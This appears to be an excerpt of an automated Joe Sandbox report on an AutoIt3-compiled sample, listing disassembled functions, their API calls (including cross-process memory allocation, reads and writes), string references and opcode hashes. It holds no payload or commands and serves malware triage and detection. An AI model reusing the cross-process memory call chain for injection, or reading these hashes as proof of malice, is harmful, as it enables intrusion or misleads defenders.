                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                          • String ID: .lnk
                                                                          • API String ID: 2126378814-24824748
                                                                          • Opcode ID: bacd81d3691c012d55d75bf734f1d7abb91d92e5174075cd8c4ebe484efd262e
                                                                          • Instruction ID: eb99b04c5382027888d812ad21571c814c138b7a9728d75793bb3ae221ffb81b
                                                                          • Opcode Fuzzy Hash: bacd81d3691c012d55d75bf734f1d7abb91d92e5174075cd8c4ebe484efd262e
                                                                          • Instruction Fuzzy Hash: F8A165746042019FC716EF14C890E9AB7F5FF89314F058989F8999B3A1CB31ED45CB91
                                                                          Function 0036B2F3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • OleSetContainedObject.OLE32(?,00000001), ref: 0036B4BE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ContainedObject
                                                                          • String ID: AutoIt3GUI$Container$%:
                                                                          • API String ID: 3565006973-879563236
                                                                          • Opcode ID: 6608e1233846cc1051d03369f9db117b49e8d22fc7efd8426c031b0de1175bb5
                                                                          • Instruction ID: b89b1597d97647a88fccf3f76b819eacfc5cc699a077c310ed033f8468863df8
                                                                          • Opcode Fuzzy Hash: 6608e1233846cc1051d03369f9db117b49e8d22fc7efd8426c031b0de1175bb5
                                                                          • Instruction Fuzzy Hash: D4913974200601AFDB15DF64C884BAABBE9FF49710F20856DF946CB6A5DB70E881CF50
                                                                          Function 0033501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __startOneArgErrorHandling.LIBCMT ref: 003350AD
                                                                            • Part of subcall function 003400F0: __87except.LIBCMT ref: 0034012B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorHandling__87except__start
                                                                          • String ID: pow
                                                                          • API String ID: 2905807303-2276729525
                                                                          • Opcode ID: 13607f701d4e68c7514f72f4cd31ce3d23914d97c96e9e32a62a3ff8fb778745
                                                                          • Instruction ID: b15e023c63c00af92b13cef0cc606918a79851ed2e654ee84a12faeedd39056d
                                                                          • Opcode Fuzzy Hash: 13607f701d4e68c7514f72f4cd31ce3d23914d97c96e9e32a62a3ff8fb778745
                                                                          • Instruction Fuzzy Hash: 03516771B0860286DB1B7B24CDC136E3BD8EB41710F208D59E5D68E2E9EF759DC49AC2
                                                                          Function 00358584 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID: 3c2$_2
                                                                          • API String ID: 4104443479-3690450720
                                                                          • Opcode ID: 91984a69a894fbe63956f78dc2ccded04254d282cac9091dfc5acf83e01414f3
                                                                          • Instruction ID: acb416bfceec055953f7eaf7f4e54f440844ee80946203782632972508a2a5e4
                                                                          • Opcode Fuzzy Hash: 91984a69a894fbe63956f78dc2ccded04254d282cac9091dfc5acf83e01414f3
                                                                          • Instruction Fuzzy Hash: 0A517E70E00619DFCB26CF68D880AAEB7F5FF44305F158529E85AE7260EB30A959CB51
                                                                          Function 003697F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 003714BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00369296,?,?,00000034,00000800,?,00000034), ref: 003714E6
                                                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0036983F
                                                                            • Part of subcall function 00371487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003692C5,?,?,00000800,?,00001073,00000000,?,?), ref: 003714B1
                                                                            • Part of subcall function 003713DE: GetWindowThreadProcessId.USER32(?,?), ref: 00371409
                                                                            • Part of subcall function 003713DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0036925A,00000034,?,?,00001004,00000000,00000000), ref: 00371419
                                                                            • Part of subcall function 003713DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0036925A,00000034,?,?,00001004,00000000,00000000), ref: 0037142F
                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003698AC
                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003698F9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                          • String ID: @
                                                                          • API String ID: 4150878124-2766056989
                                                                          • Opcode ID: 02ea01bc82e0c764ee2b3cc68e18c4900fa99e8c6bd2aec7d44bf86e179504de
                                                                          • Instruction ID: 9c640cac6ebdf340464c1c7e0447eea8d58045b55fd198a9fc43dc05b0a89f20
                                                                          • Opcode Fuzzy Hash: 02ea01bc82e0c764ee2b3cc68e18c4900fa99e8c6bd2aec7d44bf86e179504de
                                                                          • Instruction Fuzzy Hash: FA414176900218BFDB21DFA4CC41BDEBBB8EF09300F008199F945B7151DA756E45CBA0
                                                                          Function 00397946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0039F910,00000000,?,?,?,?), ref: 003979DF
                                                                          • GetWindowLongW.USER32 ref: 003979FC
                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00397A0C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Long
                                                                          • String ID: SysTreeView32
                                                                          • API String ID: 847901565-1698111956
                                                                          • Opcode ID: 32febb8d2eacd2b7228a572ff5e692346443d083ab222a1e3738f98c955cee8b
                                                                          • Instruction ID: 520ff24f9190c7633d104aa545245359e752c40bcdb43813f8c70f0300a1db0a
                                                                          • Opcode Fuzzy Hash: 32febb8d2eacd2b7228a572ff5e692346443d083ab222a1e3738f98c955cee8b
                                                                          • Instruction Fuzzy Hash: 7731AB32214206AFDF169E38DC45BEB77A9EB09324F254725F875E22E0D731ED518B50
                                                                          Function 003973D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00397461
                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00397475
                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00397499
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Window
                                                                          • String ID: SysMonthCal32
                                                                          • API String ID: 2326795674-1439706946
                                                                          • Opcode ID: d5dfb54019843d67aeedf13d28d3ae749cc532b8d807224484b23aae1933d431
                                                                          • Instruction ID: 4eee5f2b2583244f5540876220a02bd696fb82456735cb5ddf4171a2787cdec3
                                                                          • Opcode Fuzzy Hash: d5dfb54019843d67aeedf13d28d3ae749cc532b8d807224484b23aae1933d431
                                                                          • Instruction Fuzzy Hash: 1121D332510219BFDF128F55DC46FEA3B69EF48724F120114FE15AB1D1DA75AC51CBA0
                                                                          Function 00397B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00397C4A
                                                                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00397C58
                                                                          • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00397C5F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$DestroyWindow
                                                                          • String ID: msctls_updown32
                                                                          • API String ID: 4014797782-2298589950
                                                                          • Opcode ID: 09bf0c33b4fbd37f26e4dfa133aa974c887e6746b19df6e06c7dedf42682ece0
                                                                          • Instruction ID: 399f43844a368ec8fbc2c3a78c6d950d726d1f54ee7a2c2329761dea229e6faa
                                                                          • Opcode Fuzzy Hash: 09bf0c33b4fbd37f26e4dfa133aa974c887e6746b19df6e06c7dedf42682ece0
                                                                          • Instruction Fuzzy Hash: 75215EB5614209AFDB12DF24DCC1DA777ECEF4A394B550059FA019B3A1CB31EC519B60
                                                                          Function 00396CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00396D3B
                                                                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00396D4B
                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00396D70
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$MoveWindow
                                                                          • String ID: Listbox
                                                                          • API String ID: 3315199576-2633736733
                                                                          • Opcode ID: 77eb1cec76d590959d9613e15cd0fa2c9b533700cde8bf3d1c6caaae1ce33071
                                                                          • Instruction ID: 7cb36c5bedb25bc0339e8d71dc12046094217f43fab53c9f4b5e27dd8cd3de25
                                                                          • Opcode Fuzzy Hash: 77eb1cec76d590959d9613e15cd0fa2c9b533700cde8bf3d1c6caaae1ce33071
                                                                          • Instruction Fuzzy Hash: 4321B032601118BFDF138F54DC46FEB3BAEEB89750F028129F9559B1A0C6719C518BA0
                                                                          Function 003839E9 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __snwprintf.LIBCMT ref: 00383A66
                                                                            • Part of subcall function 00317DE1: _memmove.LIBCMT ref: 00317E22
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: __snwprintf_memmove
                                                                          • String ID: , $$AUTOITCALLVARIABLE%d$%:
                                                                          • API String ID: 3506404897-379266330
                                                                          • Opcode ID: 71b120d69773f626ead15f0bb0203f6121fa07af3048005748fdc16131e85d06
                                                                          • Instruction ID: 202afae6a765b857fd96a360ef869d57dd06c318bb509bd175125f21c3d687ae
                                                                          • Opcode Fuzzy Hash: 71b120d69773f626ead15f0bb0203f6121fa07af3048005748fdc16131e85d06
                                                                          • Instruction Fuzzy Hash: 5F219631600219AFCF1AFF64CC82EEE77B9AF48700F544499F445AB281DB34EA45CBA5
                                                                          Function 0039770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00397772
                                                                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00397787
                                                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00397794
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID: msctls_trackbar32
                                                                          • API String ID: 3850602802-1010561917
                                                                          • Opcode ID: bafcaa104f12151b84b5790d65bcf3f9147c47a0a18173174797382a8bf8d5f9
                                                                          • Instruction ID: e9ebce499262073a979f381c99ab6b326905903889460749f3f428e730dc0ce7
                                                                          • Opcode Fuzzy Hash: bafcaa104f12151b84b5790d65bcf3f9147c47a0a18173174797382a8bf8d5f9
                                                                          • Instruction Fuzzy Hash: 3B11E372254208BEEF265FA5DC05FEB77ADEF89B54F124129FA41A60D0C672E851CB20
                                                                          Function 00336B71 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: __calloc_crt
                                                                          • String ID: <$@B=
                                                                          • API String ID: 3494438863-4015857562
                                                                          • Opcode ID: 0889223ddd3eaef5dfa872a1c02d4ba490ef81264f15b2aa52b6e829ca97be5c
                                                                          • Instruction ID: 297a744f6ca98cb8418615cf7406179c10dedf009c9254a38ef924d7356d3d78
                                                                          • Opcode Fuzzy Hash: 0889223ddd3eaef5dfa872a1c02d4ba490ef81264f15b2aa52b6e829ca97be5c
                                                                          • Instruction Fuzzy Hash: B9F04475205611AFE7678F66BCD2B56679DE710771F50481BE100CE590EB7098494BC4
                                                                          Function 00339B79 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __lock.LIBCMT ref: 00339B94
                                                                            • Part of subcall function 00339C0B: __mtinitlocknum.LIBCMT ref: 00339C1D
                                                                            • Part of subcall function 00339C0B: EnterCriticalSection.KERNEL32(00000000,?,00339A7C,0000000D), ref: 00339C36
                                                                          • __updatetlocinfoEx_nolock.LIBCMT ref: 00339BA4
                                                                            • Part of subcall function 00339100: ___addlocaleref.LIBCMT ref: 0033911C
                                                                            • Part of subcall function 00339100: ___removelocaleref.LIBCMT ref: 00339127
                                                                            • Part of subcall function 00339100: ___freetlocinfo.LIBCMT ref: 0033913B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
                                                                          • String ID: 8<$8<
                                                                          • API String ID: 547918592-3109862915
                                                                          • Opcode ID: d6f06fcaaca60212827158a0d3b31a582ca7c6b90233479e505e7bf6e63a5d17
                                                                          • Instruction ID: 8715f09bd9f976d27cded1dc7ef8f42bbc1e770e9ab14d8cd8a413a7d9b67fc2
                                                                          • Opcode Fuzzy Hash: d6f06fcaaca60212827158a0d3b31a582ca7c6b90233479e505e7bf6e63a5d17
                                                                          • Instruction Fuzzy Hash: C6E08C7294B305EAEA13FBA46987F68A6549B00B21F21115FF045EA1C1CEF81C408717
                                                                          Function 00314C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00314B83,?), ref: 00314C44
                                                                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00314C56
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                          • API String ID: 2574300362-1355242751
                                                                          • Opcode ID: d2d82f4f12e0f803292c52fe5cf7068d85073b07790b547615f5dc9084e21f8f
                                                                          • Instruction ID: 825fe135d8cd81f7413d89a3b4d9bcfc710f27048a550beca6dd2f34c21b8fdf
                                                                          • Opcode Fuzzy Hash: d2d82f4f12e0f803292c52fe5cf7068d85073b07790b547615f5dc9084e21f8f
                                                                          • Instruction Fuzzy Hash: 1DD01730610713DFDB269F32D91868A76E8AF0A351F22883ED496DA160E770D8C0CA90
                                                                          Function 00314C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00314BD0,?,00314DEF,?,003D52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00314C11
                                                                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00314C23
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                          • API String ID: 2574300362-3689287502
                                                                          • Opcode ID: 330f1bab27014769f624568176fac6f5f3db1ce741ad05262e77d43d9069d6db
                                                                          • Instruction ID: c753c2e445b2e1dab932f79d4734144a8f0ec275a28e9cbe56841bc3e9328459
                                                                          • Opcode Fuzzy Hash: 330f1bab27014769f624568176fac6f5f3db1ce741ad05262e77d43d9069d6db
                                                                          • Instruction Fuzzy Hash: 78D0EC30511712DFD7226FB1D908A86B6D9AF0D351F11883AD486D6160E6B0D8C08690
                                                                          Function 00390DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,00391039), ref: 00390DF5
                                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00390E07
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                                          • API String ID: 2574300362-4033151799
                                                                          • Opcode ID: 6465719176933345f3830d2ac7a3789fca6554ac4d45d38fae23acdbcfbd0e2f
                                                                          • Instruction ID: 6ed10d77946d5f6afc2a2c7a47925134284c16a6515df48c7c59331c54291005
                                                                          • Opcode Fuzzy Hash: 6465719176933345f3830d2ac7a3789fca6554ac4d45d38fae23acdbcfbd0e2f
